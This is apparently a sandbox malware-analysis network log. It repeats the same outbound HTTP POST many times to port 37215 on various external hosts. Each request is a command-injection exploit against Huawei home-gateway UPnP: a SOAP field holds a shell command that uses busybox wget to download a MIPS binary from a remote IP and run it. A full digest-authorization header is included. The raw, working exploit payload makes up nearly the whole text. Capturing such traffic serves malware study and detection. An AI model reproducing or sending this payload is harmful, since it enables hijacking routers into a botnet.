                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              733192.168.2.155740441.125.41.10937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226459980 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              734192.168.2.1555390122.209.70.1537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226481915 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              735192.168.2.1538416102.69.143.22237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226483107 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              736192.168.2.153944037.243.151.22437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226507902 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              737192.168.2.1546994190.203.251.6637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226562023 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              738192.168.2.155261294.67.133.10837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226562023 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              739192.168.2.155038631.81.182.24837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226624012 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              740192.168.2.1557006138.5.149.19137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226624012 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              741192.168.2.1557930190.119.252.18937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226718903 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              742192.168.2.1543656157.229.95.14037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226761103 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              743192.168.2.1536804156.154.244.15837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.226807117 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
